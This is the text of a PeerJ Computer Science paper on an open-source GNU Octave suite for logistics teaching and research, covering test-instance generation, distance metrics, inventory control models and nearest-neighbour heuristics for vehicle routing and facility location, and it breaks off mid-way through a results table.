http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ With the rise of Industry 4.0 (which is associated to “Internet of Things” or “SMART systems”) logistics faces the challenge to control all operations within enterprises cooperating in supply and logistic chains (Kuczyńska-Chalada, Furman & Poloczek, 2018). In this context, the use of (a) embedded systems and (b) intelligent systems are considered as vital resources to achieve smart and autonomous flow of raw materials, work-in-process, and distribution of end products throughout the SC in accordance to human planning (Lloyd et al., 2013; Kuczyńska-Chalada, Furman & Poloczek, 2018). The development of intelligent systems is based on quantitative research as it involves optimization, mathematical modeling, simulation and statistical assessment. A key resource for these tasks is the availability of specialized data for analysis and testing. Thus, research on state-of-the-art systems for transportation planning is supported by available databases of test sets (instances) such as TSPLIB (Reinelt, 1991, 1997) for the Traveling Salesman Problem, CVRPLIB (Uchoa et al., 2017; Oliveira et al., 2019) for the Vehicle Routing Problem, and SJC/p3038 sets (Chaves & Nogueira-Lorena, 2010; Nogueira-Lorena, 2007) for Facility Location Problems. However, not all databases consider the different aspects of real logistics problems such as specific demand/location patterns and/or distance metrics. Also, in practice, development and implementation of specific resources and solving methods are restricted by the required technical knowledge or proficiency associated to programing platforms and mathematical modeling. As presented in Rao, Stenger & Wu (1998) the use of software programs, computer programing and spreadsheet modeling, are effective problem- solving tools within logistic education. Hence, universities have revised their programs to provide qualified logistic professionals with these tools (Erturgut, 2011). Currently, there is an extensive portfolio of published educational resources for the logistic professional. For example, within the field of inventory control, the use of simulation software has been used with positive results (Al-Harkan & Moncer, 2007; Carotenuto, Giordani & Zaccaro, 2014). For vehicle routing and facility location problems, software such as VRP Spreadsheet Solver and the FLP Spreadsheet Solver (which can solve problems with up to 200 and 300 customers respectively) (Erdogan, 2017a, 2017b) can be effectively used for application and teaching purposes. While the methodological steps to use these tools are frequently reported within the respective literature (i.e., manuals, published articles), source data such as programing code and data sets is not explicitly or publicly available for sharing. Also, license restrictions regarding the implementation software avoids the use of some simulation models for commercial purposes. The high costs of some of these licenses restrict their use by freelance professionals, micro, small and medium enterprises, which have limited economic resources. In this context, the present work describes the development of an open-source coded suite for the academic researcher and professional in logistics and supply chain management, with the purpose of supporting the modeling and programing skills required to implement and test more advanced methods as those reported in the scientific literature Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 2/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ and/or shared in undergraduate/postgraduate courses. In particular, the following aspects are addressed: � generation of test instances for routing and facility location problems with real geographical coordinates; � computation of Euclidean, Manhattan and geographical arc length distance metrics for solving routing and facility location problems (symmetric and asymmetric metrics are considered); � importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; � simulation of non-deterministic inventory control models for assessment of supply strategies; � designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for vehicle routing and facility location problems. As complementary material, a case study is solved with the integration of the functions of the coded suite. Implementation of the coded suite was performed through the open source programing software GNU Octave (Eaton et al., 2018). The advantage of this software is that it runs on GNU/Linux, macOS, BSD, and Windows, and it is compatible with many MATLAB scripts. Also, its language syntax makes it easily adaptable to other languages such as C++. DEVELOPMENT OF TEST INSTANCES The development of location data is important to test solving methods or algorithms for facility location and vehicle routing problems. To generate location data associated to real geographical coordinates the first step is to understand the coordinate system of the real world. Figure 1 presents the ranges for longitude and latitude coordinates (λ and ϕ respectively) of the world map. With these ranges the second step consists on generating location data within specific regions. In example, consider the region delimited by λ ∈ [−102, −100] and ϕ ∈ [20, 22]. A set of locations within this region can be generated through two approaches: � First, by adapting an already existing set of locations (standard test instance). There are available different sets of test instances for research within the distribution field. However, many of them are not adjusted to geographic coordinates. This can affect the process to estimate distance metrics in kilometers. Figure 2 presents the visualization of coordinates from the instance d493 of the database TSPLIB (Reinelt, 1997). As presented, the range of the x and y axes are different from those presented in Fig. 1. These non-geographical coordinates can be converted by using the following equation: v0 ¼ maxnew � minnew maxold � minold � � � ðv � maxoldÞ þ maxnew; (1) where v is the value within the old range and v′ is the converted value within the new range. Eq. (1) is computed by the function rescaling of the coded suite. As presented in Fig. 2 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 3/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ the location data from the instance d493 is correctly converted into geographic coordinates. � Second, by using a probability distribution. In this case, random coordinates can be generated by using distributions such as the uniform distribution with parameters a and b which represent the minimum and maximum values for the generation range, or the normal distribution where a and b represent the mean and standard deviation values within the generation range. Figure 3 presents N = 493 geographic coordinates considering these distributions. This data was generated by the function generatedata of the coded suite. In addition to location data, information regarding demands of locations and capacities of vehicles and warehouses must be generated for routing and coverage problems. By assuming a homogeneous fleet/set of warehouses a unique value is assigned to each of these elements. However, this does not necessarily apply to the demands of the locations to be served. Some instances have considered homogeneous demand (same value for all locations). However, in practice, this is not considered. The function rescaling includes additional code to generate random demand for each location. Note that, within the demand context, the first location is considered to be the central depot or warehouse, thus, demand is equal to zero. A note on the current approach to generate geographic data While test location data is generated by mathematical methods such as in Diaz-Parra et al. (2017), in recent years, obtaining geographic location data, also known as geo-location data, has been facilitated by the use of smart phones with integrated Global Positioning System (GPS) receivers. In the market there are diverse Software Development Kits (SDKs) and Application Programming Interfaces (APIs) to process this data for mapping, route planning and emergency tracking purposes. Among these, the Google Maps© and ArcGIS© systems can be mentioned (Google LLC, 2020; Environmental Systems Research Institute, 2020). As geo-location data is mainly obtained from smart phones and other mobile devices used by people and organizations, using and sharing this data by developers of Geographic Information System (GIS) applications has been the subject of debate and discussion. This is due to concerns regarding the privacy and confidentiality of this data (Richardson, 2019; Blatt, 2012). Although security technology and government regulations are frequently developed and established to ensure the ethical use of geo- location data, publicly available databases are the main resource for academic and research purposes. Recently, more benchmark instances are generated for vehicle routing problems (Uchoa et al., 2017) which can be adapted to geographic data with the coded suite. Nevertheless, within the context of Industry 4.0, the computational proficiency on GIS applications may become an important requirement and advantage for future logistic professionals and/or academics. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 4/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ DISTANCE METRICS Within distribution problems, a metric to determine the suitability of a route over other routes is required. The most common criteria to optimize distribution problems is to minimize the metric of distance which is positively associated to transportation costs. There is a wide set of distance metrics, being the Euclidean distance the most commonly Figure 1 World map displaying the range for longitude (λ) and latitude (φ) coordinates in degrees. Full-size DOI: 10.7717/peerj-cs.329/fig-1 rescaling function Figure 2 Coded suite: re-scaling and plotting of existing location data with the function rescaling. Full-size DOI: 10.7717/peerj-cs.329/fig-2 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 5/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-1 http://dx.doi.org/10.7717/peerj-cs.329/fig-2 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ used. Other metrics, such as Manhattan distance or arc length are more closely associated to real-world contexts (Reinelt, 1997). Figure 4 presents the widely known mathematical formulations to compute these distance metrics. Within the coded suite, these metrics are computed by the function distmetrics. It is important to remember that the distance is computed between two points i and j, thus, the x and y coordinates, or longitude (λ) and latitude (ϕ) coordinates, must be known in advance. An important resource for any distribution problem is known as the distance matrix A which stores all distances between each location i and j within the distribution network. Thus, this matrix, of dimension N × N (where N is the number of locations, including the central depot) stores each dij data where i, j = 1,…, N and dii = djj = 0 (the distance between each point and itself is zero). The function distmetrics also computes the symmetric distance matrix (dij = dji) for each type of metric. Uniform Distribu�on A B C D E Figure 3 Coded suite: generation of N geographic coordinates and plotting with the function generatedata. (A) Data generated with uniform distribution (a = −102 and b = −100 for longitude, a = 20 and b = 22 for latitude). (B–E) Data generated with normal distribution with mean values a = −101 and a = 21 for longitude and latitude respectively. Variability of standard deviation is represented by b = 2z and b = z for longitude and latitude respectively, where z varies from ±0.5 to ±3.0 and represents the number of standard deviations for dispersion. Full-size DOI: 10.7717/peerj-cs.329/fig-3 A B C Figure 4 Mathematical formulations to compute (A) Euclidean, (B) Manhattan, and (C) Arc length distances between two location points. Full-size DOI: 10.7717/peerj-cs.329/fig-4 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 6/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-3 http://dx.doi.org/10.7717/peerj-cs.329/fig-4 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ By considering the converted coordinates into longitude and latitude degrees, the Euclidean and Manhattan distances provide similar values. In this regard, these values do not represent kilometers. In order to obtain a distance in kilometers, the arc length metric is considered. This metric considers the spherical model of the Earth’s surface which has a radius of 6,371 km. For this, the coordinates in latitude and longitude degrees are converted into radians by a factor of π/180°. This leads to a symmetrical distance matrix in kilometers. It is important to note that an approximation of the Manhattan distance can be estimated in terms of the arc length or Euclidean distance by considering trigonometry and right triangles theory. By knowing the angle θ between the hypotenuse and one of the catheti, and the length or magnitude of the hypotenuse (i.e., Euclidean or arc length dij), the length of both catheti can be estimated as: c1 ¼ dij � sinðuÞ; (2) c2 ¼ dij � cosðuÞ: (3) Thus, if the Euclidean or arc length metric is available, then the Manhattan distance can be estimated as c1 + c2. Different estimates can be obtained based on the assumed value for θ. Finally, an asymmetric distance matrix (dij ≠ dji) can be computed by adjusting the function distmetrics to represent dji = dij + unifrnd(0, mean(dij)). Note that this operation modifies dji by adding to dij a random uniform value within the range from 0 to the mean value of all distances within A (although a different random value can be added). A note on distance metrics The type of distance or cost metric is one of the main aspects of distribution problems because it is correlated to the accuracy of their solution. Diverse SDKs and APIs are currently used to estimate the asymmetric/symmetric distances and/or times between locations considering the actual urban layout and traffic conditions. Tools such as Google Maps© and Waze© perform these tasks in real-time on computers and mobile devices. Nevertheless, construction of a distance matrix may require a large number of GIS queries (n × n − n) which are frequently restricted by the license terms of the SDK/API. Also, there are concerns regarding the privacy and confidentiality of this data as routing patterns are sensitive information. Thus, mathematical formulations are considered to estimate these metrics in a more direct way for the development of methods to solve distribution problems. Among other distance metrics the following can be mentioned: � ellipsoidal distance, which is the geodesic distance on the ellipsoidal Earth (Mysen, 2012). It is based on the assumption that the ellipsoid is more representative of the Earth’s true shape which is defined as geoid. While the spherical model assumes symmetry at each quadrant of the Earth, the ellipsoidal model assumes the associated asymmetry and the implications for route and facility location planning (Cazabal-Valencia, Caballero-Morales & Martinez-Flores, 2016). Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 7/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ � geodesic distance on Riemannian surfaces, which in general terms can estimate different curvatures and disturbances on the Earth’s surface for route and facility location planning (Tokgöz & Trafalis, 2017). INVENTORY CONTROL Inventory management is an important aspect of distribution as proper inventory levels are required to ensure the constant supply of goods. This however must comply with restrictions to avoid unnecessary costs associated to inventory supply processes. In this regard, the term Economic Order Quantity (EOQ) has been used to define the optimal lot size Q which is required to minimize inventory management costs such as those associated to ordering and holding goods through the supply chain. Determination of Q may become a complex task due to the different variables involved in the inventory supply processes such as costs, delivery times, planning horizon, cycle time, stock-out costs and probabilities, service levels, demand patterns (Thinakaran, Jayaprakas & Elanchezhian, 2019). Thus, different mathematical models have been developed to determine the EOQ considering these multiple variables (Thinakaran, Jayaprakas & Elanchezhian, 2019; Braglia et al., 2019; De & Sana, 2015; Hovelaque & Bironneau, 2015). In this context, depending of the variability of the demand patterns (as measured by a coefficient of variability CV = σ/μ, where σ and μ are the standard deviation and mean of the demand data respectively) there are inventory control models for deterministic and non-deterministic demand. If demand follows an almost constant pattern with small variability (CV < 0.20) it is assumed to be deterministic, otherwise it is non-deterministic (CV ≥ 0.20). In practice, demand is frequently non-deterministic, and two of the most useful inventory control models for this case are the continuous and periodic review models. These models, also known as the (Q, R) (Hariga, 2009; Adamu, 2017) and P (Lieberman & Hillier, 2000) models respectively, are analyzed in the following sections. Continuous review model The (Q, R) model considers the costs and variables described in Table 1. With these parameters and variables, lots of size Q are ordered through a planning horizon to serve a cumulative demand. Figure 5 presents an overview of the supply patterns considered by this model and its mathematical formulation to determine Q, R, and the Total Inventory Costs associated to it. As presented, at the beginning of the planning horizon, the inventory level starts at R + Q. This is decreased by the daily or weekly demand estimated as d. If historical demand data is available, it can be used to provide a better estimate for d. As soon as the inventory level reaches R, the inventory manager must request an order of size Q because there is only stock to supply LT days or weeks. Here, it is important to observe that the inventory must be continuously reviewed or checked to accurately detect the re-order point R and reduce the stock-out risk during the LT. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 8/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Because uncertain demand is assumed, the inventory consumption rate is different throughout the planning horizon. Hence, R can be reached at different times. This leads to inventory cycles T of different length. For this model, the function continuousreview computes the lot size Q, the reorder point R, and the Total Inventory Cost. This function also generates random demand test data Table 1 Parameters and variables of the (Q, R) inventory control model. Variable Description C Purchase cost per unit of product Co Order cost per lot Q Ch Holding cost per unit of product in inventory p Stock-out cost per unit of product R Reorder point (level of inventory at which a lot of size Q must be ordered to avoid stock-out) d Average daily demand of products, or average demand of products on the smallest unit of time σ Standard deviation of the average daily demand of products (it must be estimated on the same unit of time as d) μLT Average demand of products through the Lead Time (LT). It can be estimated as d × LT if both are on the same unit of time σLT Standard deviation of products through the LT. It can be estimated as r � ffiffiffiffiffiffi LT p if both are on the same unit of time D Cumulative demand through the planning horizon. If d is a weekly demand, then D = K × d where K is the number of weeks within the planning horizon L(z) Loss function associated to R Figure 5 Continuous review (Q, R) model. (A) Inventory supply pattern. (B) Iterative algorithm to estimate Q and R. (C) Mathematical formulation of the total inventory costs. Full-size DOI: 10.7717/peerj-cs.329/fig-5 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 9/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-5 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ (dtest) to plot the inventory supply patterns obtained with the computed parameters Q and R. dtest is generated through the expression: dtest ¼ d � ws (4) where w is the number of standard deviations and it is randomly generated within a specific range. Note that Q and R are estimated from historical data (d, σ) and an specific z as computed by the iterative algorithm described in Fig. 5B. Thus, if test data is generated with a higher variability (i.e., with w > z) the model can provide an useful simulation to determine the break point of the strategy determined by Q and R. Figure 6 presents examples considering w ∈ [−3, +3], w ∈ [−5, +5], and w ∈ [−7, +7] for a case with d = 10 and σ = 4 (CV = 0.40). As presented, by considering demand with the mathematical limit of [−3, +3] standard deviations (as defined by the standard normal distribution) the model is able to avoid stock-out events. However, if much higher variability is considered stock-out A B C stock-out Figure 6 Coded suite: performance of the continuous review (Q, R) strategy with different variability conditions as computed by the function continuousreview. (A) Test demand data generated with w ∈ [−3, +3] standard deviations. (B) Test demand data generated with w ∈ [−5, +5] standard deviations. (C) Test demand data generated with w ∈ [−7, +7] standard deviations. Full-size DOI: 10.7717/peerj-cs.329/fig-6 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 10/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-6 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ (by far, higher than the input data for estimation of Q and R), the parameters of the model are not able to avoid stock-out events. Also note that, as variability increases the consumption rate is faster, thus more orders must be requested. Thus, for w ∈ [−3, +3] five orders were needed while for w ∈ [−5, +5] and w ∈ [−7, +7] six orders were needed. This corroborates the validity of this method for inventory control under uncertain demand and assessment of scenarios with higher variability. Periodic review model The P model considers the costs and variables described in Table 2. Figure 7 presents an overview of the supply patterns considered by this model and its mathematical Figure 7 Periodic review (P) model. (A) Inventory supply pattern. (B) Mathematical formulation to estimate Q at each period. (C) Mathematical formulation of the total inventory costs. Full-size DOI: 10.7717/peerj-cs.329/fig-7 Table 2 Main parameters and variables of the (Q, R) and P models. Variable Description Co Order cost per lot Q Ch Holding cost per unit of product in inventory T Time between inventory reviews and T > LT d Average daily demand of products, or average demand of products on the smallest unit of time D Cumulative demand through the planning horizon. If d is a weekly demand, then D = K × d where K is the number of weeks within the planning horizon σ Standard deviation of the average daily demand of products (it must be estimated on the same unit of time as d) z Number of standard deviations associated to a service level Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 11/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-7 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ formulation to determine Q and the Total Inventory Costs associated to it. In contrast to the (Q, R) model, in the P model the inventory review is performed at fixed intervals of length T and Q is estimated considering the available inventory I at that moment. Thus, different lots of size Q are ordered depending of the available inventory at the end of the review period T. For this model, the function periodicreview computes the lot size Q and the Total Inventory Cost. This function also generates random demand test data (dtest) to plot the inventory supply patterns obtained with the computed parameter Q. As in the case of the (Q, R) model, Fig. 8 presents examples considering w ∈ [−3, +3], w ∈ [−5, +5], and w ∈ [−7, +7] for the variable demand rate. Here, the advantages of the (Q, R) model are evident for demand with high variability. At the moment of review (at the end of T), the lot size Q − I is estimated based on the stock-out A B C stock-out Figure 8 Coded suite: performance of the periodic (P) strategy with different variability conditions as computed by the function periodicreview. (A) Test demand data generated with w ∈ [−3, +3] standard deviations. (B) Test demand data generated with w ∈ [−5, +5] standard deviations. (C) Test demand data generated with w ∈ [−7, +7] standard deviations. Full-size DOI: 10.7717/peerj-cs.329/fig-8 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 12/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-8 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ historical data modeled through d and σ. This lot size must be able to cover the demand for the next period T + LT. However, this increases the stock out risk because ordering is restricted to be performed just at the end of T. Thus, if during that period the demand significantly increases (more than that modeled by σ), inventory can be consumed at a higher rate. For the considered example, the required service level was set to 98.5%. By assuming normality, the z-value associated to this probability is approximately 2.17. Thus, for demand with w ∈ [−3, +3] standard deviations, the Q estimated by the P model is marginally able to keep the supply without stock-out. As presented in Fig. 8, with higher variability there are more stock-out events. Thus, it is recommended to re-estimate the Q parameter considering the updated demand patterns during the previous T + LT (i.e., update d and σ). These observations are important while evaluating inventory supply strategies. A note on inventory control models The analysis of the (Q, R) and P models provide the basics to understand most advanced models as they introduce the following key features: uncertain demand modeled by a probability distribution function (i.e., normal distribution), quantification of stock-out risks, fixed and variable review periods/inventory cycle times, cost equations as metrics to determine and evaluate the optimal lot policy, and the use of iterative algorithms to determine the optimal parameters Q and R. Extensions on these models are continuously proposed to address specific inventory planning conditions such as: Perishable Products (Muriana, 2016; Braglia et al., 2019), New Products (Sanchez-Vega et al., 2019), Seasonal Demand (Lee, 2018), Quantity Discounts (Darwish, 2008; Lee & Behnezhad, 2015), Disruptions (Sevgen, 2016), and Reduction of CO2 Emissions (Caballero-Morales & Martinez-Flores, 2020). By reviewing these works, the need to have a proper background on mathematical modeling (i.e., equations and heuristic algorithms) and computer programing is explicitly stated, providing support to the present work. SOLVING METHODS FOR ROUTING AND FACILITY LOCATION PROBLEMS Standard approaches of Operations Research (OR) such as Mixed Integer Linear Programming (MILP) or Dynamic Programming (DP) are often of limited use for large problems due to excessive computation time (Zäpfel, Braune & Bögl, 2010). Thus, meta-heuristics have been developed to provide near-optimal solutions in reasonable time for large production and logistic problems. As introductory meta-heuristic, this work is considering two integrated local search algorithms with the fundamentals of Greedy Randomized Adaptive Search Procedure (GRASP) and Nearest-Neighbor Search (NNS). A complete review of more complex meta-heuristics and solving methods for different vehicle routing/facility location problems can be found in Basu, Sharma & Ghosh (2015), Prodhon & Prins (2014) and Bräysy & Gendreau (2005a, 2005b). Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 13/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ For the development of the integrated local search algorithms it is important to identify the characteristics of the vehicle routing/facility location problems and their solutions. This is discussed in the following sections. Vehicle routing problem In this problem, a vehicle or set of vehicles departs from a single location where a depot or distribution center is established. These vehicles serve a set of locations associated to customers/suppliers to deliver/collect items. If each vehicle has finite capacity then the vehicle’s route can only visit those customer/ supplier locations whose requirements do not exceed its capacity. This leads to define multiple routes to serve unique sets of customer/supplier locations where each location can only be visited once. Optimization is focused on determining the required routes and the visiting sequence to minimize traveling distance and/or costs. Figure 9 presents an overview of the capacitated VRP (also known as CVRP). For this work, two main tasks are considered to provide a solution: partitioning and sequencing of minimum distance. Partitioning can be applied over a single total route to obtain sub-routes served by vehicles of finite capacity. Sequencing then can be applied over a set of customer locations to determine the most suitable order to reduce traveling time/distance. This can be applied on the single total route and on each sub-route. The coded suite includes the function nnscvrp which implements a nearest neighbor search (NNS) approach for the sequencing and partitioning tasks. This is performed as follows: � first, sequencing through the nearest or closest candidate nodes within a distance “threshold” is performed. This “threshold” is computed by considering the minimum distances plus the weighted standard deviation of the distances between all nodes or locations. � second, the total partial route obtained by the NNS sequencing is then partitioned into capacity-restricted sub-routes by the sub-function partitioning2. � third, the sub-function randomimprovement is executed on the total partial route obtained by the NNS sequencing, and on each sub-route generated by the function d1 d2 d3 d4 d5 d6d7 d0 R2 R3 R1 + ≤ + ≤ + + ≤ di = demand of customer i, depot located at i = 0 = capacity of vehicle/route j solution Figure 9 Characteristics of the capacitated vehicle routing problem (CVRP). Full-size DOI: 10.7717/peerj-cs.329/fig-9 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 14/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-9 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ partitioning2. This sub-function performs exchange and flip operators on random sub- sequences and points within each route/sub-route following a GRASP scheme. Finally, the function nnscvrp plots the locations, the total route, and the CVRP sub- routes for assessment purposes. Figure 10 presents the results obtained for the instance X-n219-k73.vrp with Euclidean distance. The instance consists of 219 nodes (i.e., 218 customer/demand locations and one central depot location) and homogeneous fleet with capacity of 3. As observed, the function nnscvrp defined 73 sub-routes which is the optimal number as stated in the file name of the instance. An important aspect of any solving method, particularly meta-heuristics, is the assessment of its accuracy. The most frequently used metric for assessment is the % error gap, which is computed as: %e ¼ a � b b � � � 100:0 (5) where a is the result obtained with the considered solving method and b is the best- known solution. For the present example, the best-known solution is 117,595.0 while the described NNS algorithm achieved a solution of a = 119,162.6799. Hence, the error gap is estimated as 1.33%, which is very close to the best-known solution. Also, this result was obtained within reasonable time (117.046165 s). A note on solving methods for the CVRP The CVRP is one of the most challenging problems within the logistic field due to its NP-hard complexity and relevance to distribution performance. Thus, there are two main research contexts for the CVRP: � Problem Modeling: within this context the following extensions can be mentioned: CVRP with two-dimensional (2D) and three-dimensional (3D) loading constraints (Wei et al., 2018; Tao & Wang, 2015), CVRP with Traffic Jams (Mandziuk & Swiechowski, 2017), CVRP with Carriers (Rojas-Cuevas et al., 2018), VRP with Carbon Emissions (Liu et al., 2018), and CVRP with Alternative Delivery, Pick-Up and Time Windows (Sitek et al., 2020). � Problem Solving: frequently, the solving method is proposed with the model of the problem. Due to the complexity of the CVRP itself, most of the solving methods are based on meta-heuristics such as: Particle Swarm Optimization (PSO) (Hannan et al., 2018), Quantum Immune Algorithm (QIA) (Liu et al., 2018), Matheuristics (Archetti & Speranza, 2014), Tabu-Search (TS) (Tao & Wang, 2015) and Genetic Algorithms (GA) (Mulloorakam & Nidhiry, 2019), with hybrid methods showing better performance. To design and test meta-heuristics, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method (i.e., construction and improvement processes) and its implementation through computer programing (i.e., coding in C++, MATLAB, Python). In this aspect, the suite code nnscvrp can provide Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 15/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ both resources. More information regarding VRP models and solving methods can be found in Toffolo, Vidal & Wauters (2019), Archetti & Speranza (2014) and Baldacci, Mingozzi & Roberti (2012). Facility location problem In this problem, it is required to determine the most suitable location for a facility or set of facilities (Multi-Facility Location Problem, MFLP) to serve a set of customers/ suppliers. As in the CVRP, if capacity is considered for the facilities, multiple facilities are required to serve unique sets of customer/supplier locations where each location can only be served by a unique facility. If facilities are located at the location of minimum distance to all customers/suppliers, the MFLP is known as the capacitated Weber problem (Aras, Yumusak & Altmel, 2007). However, if facilities are located at the average locations between all customers/suppliers (i.e., at the centroids), the MFLP is known as the capacitated centered clustering problem (CCCP) (Negreiros & Palhano, 2006). Finally, if facilities are located at already defined median locations, the MFLP is known as the capacitated p-median problem (CPMP) (Stefanello, CB-de-Araújo & Müller, 2015). Figure 11 presents an overview of these variations of the MFLP. It is important to observe that the feature of the locations has a direct effect on the solution. Facility location problems are frequently solved through clustering or classification methods. Within the coded suite, the function nnscccp performs a nearest neighbor search (NNS) algorithm with an appropriate capacity-restricted assignment algorithm to provide a very suitable solution. This is performed as follows: � first, it generates a feasible initial solution through the sub-function random_assignment. Randomness is considered when two or more nodes are located at the same distance unconnected node “1” Total Single Route CVRP Sub-routes Partitioning + Random Improvement (Exchange/Flip Operators) connected node “1” Figure 10 Coded suite: solution of the NNS-GRASP meta-heuristic for the CVRP instance X-n219-k73.vrp as computed by the function nnscvrp. Full-size DOI: 10.7717/peerj-cs.329/fig-10 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 16/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-10 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ from a centroid, and on the initial location of the centroids. This adds flexibility to the assignment task and to the search mechanism of the NNS algorithm. � second, the initial solution is improved through the sub-function update_centroids_assignment. � third, if the solution generated by update_centroids_assignment complies with all restrictions and its objective function’s value is better than a reference value, then it is stored as the best found solution. When solving combinatorial problems, it is always recommended to verify the correctness of the solution. It is also recommended to know the convergence patterns of the solving algorithm. Both aspects provide insights regarding hidden mistakes in the computer code and deficiencies in the search mechanisms of the solving algorithm (e.g., fast or slow convergence to local optima). To address this issue, at each iteration of the NNS algorithm, the function nnscccp executes a verification and a backup routine for the best solution’s value. The purpose of the backup routine is to provide data for convergence analysis. Figure 12 presents the verified results of the function nnscccp for the CCCP instance SJC1.dat considering Euclidean distance. The instance consists of 100 nodes (i.e., 100 customer/demand locations), 10 centroids (i.e., 10 facilities to be located) and homogeneous capacity of 720. Finally, the accuracy of this solution is assessed through Eq. (5). The NNS solution, which is plotted in Fig. 12, leads to a total distance value of a = 18,043.76066 while the best- known solution leads to b = 17,359.75. Then, the error gap is estimated as 3.94% which is within the limit of 5.0% for the CCCP. The consideration of randomness within the search mechanism of the NNS algorithm is common to most meta-heuristic solving methods. Convergence is dependent of this aspect, thus, assessment of meta-heuristics is performed considering different CCCP instances and multiple executions. If the coefficient of variability of results through multiple executions is within 0.20 it can be assumed that the meta-heuristic is stable. Figure 13 presents an example of this extended assessment scheme considering instances from the well-known SJC and DONI databases. After 20 executions of the meta-heuristic (as performed in Chaves & Nogueira-Lorena (2010, 2011)), the coefficient of variability (CV), the best, worst and average results are obtained to estimate their associated error gaps from the best-known (BK) solutions of the test instances. As observed, the CV is very small, less than 3.0% for all instances, hence the algorithm is stable. Thus, a very suitable solution can be obtained within a few executions of the algorithm, which for all instances (except doni2) is within the error gap of 5.0%. Other assessment schemes can consider the execution time, time to best solution, and average computational times. This is specific for the assessment of new solving methods. Logistic research is continuously extended in both important fields: (a) mathematical modeling of problems, and (b) adaptation and development of new solving methods. As presented, this work can provide the basis and resources for these research fields. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 17/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ BA Figure 12 Coded suite: solution of the NNS meta-heuristic for the CCCP instance SJC1.dat as computed by the function nnscccp. (A) Assignment of customers to centroids. (B) Convergence of best found solution. Full-size DOI: 10.7717/peerj-cs.329/fig-12 d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 C1 C2 C3 di = demand of customer i, depot located at i = 0, = capacity of facility j d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 solution d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 C1 C2 C3 d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 C1 C2 C3 + + + + ≤ + + ≤ + + ≤ Weber Problem CCCP CPMP + A B C Figure 11 Characteristics of the capacitated facility location problem (CFLP). (A) Capacitated Weber Problem. (B) Capacitated Centered Clustering Problem (CCCP). (C) Capacitated p-Median Problem (CPMP). Full-size DOI: 10.7717/peerj-cs.329/fig-11 1 2 3 4 5 6 7 8 9 10 Average Best Worst SJC1 100 10 17359.75 19108.27 19233.84 19143.14 18031.42 19123.88 19393.45 18290.98 18174.94 18208.74 19200.32 0.02 8.00 3.87 11.72 SJC2 200 15 33181.65 34453.55 34263.04 33790.98 35184.40 34532.35 33966.42 34046.24 35374.06 35105.41 34846.92 0.02 3.81 0.72 7.21 SJC3a 300 25 45366.35 51494.75 47372.43 50184.63 47203.20 48262.37 48935.47 46790.16 48520.69 51850.40 49161.28 0.03 8.50 3.14 14.29 SJC3b 300 30 40695.46 44615.34 45297.04 45737.66 42897.90 43961.01 43714.43 44092.16 44020.33 42566.97 44201.15 0.02 8.14 4.60 13.34 SJC4a 402 30 61944.85 65574.16 66041.85 67444.02 65048.20 66532.38 65065.30 63879.09 65608.26 66293.10 64655.21 0.01 6.09 3.12 8.88 SJC4b 402 40 52214.55 54734.18 56138.30 54767.02 55450.18 56601.05 56984.65 56187.81 55050.67 55194.70 57268.72 0.01 6.96 4.83 9.68 doni1 1000 6 3021.41 3183.97 3184.49 3193.70 3200.12 3096.33 3228.53 3315.32 3254.76 3185.43 3184.49 0.02 6.35 2.45 9.73 doni2 2000 6 6080.70 6450.75 6771.04 6457.37 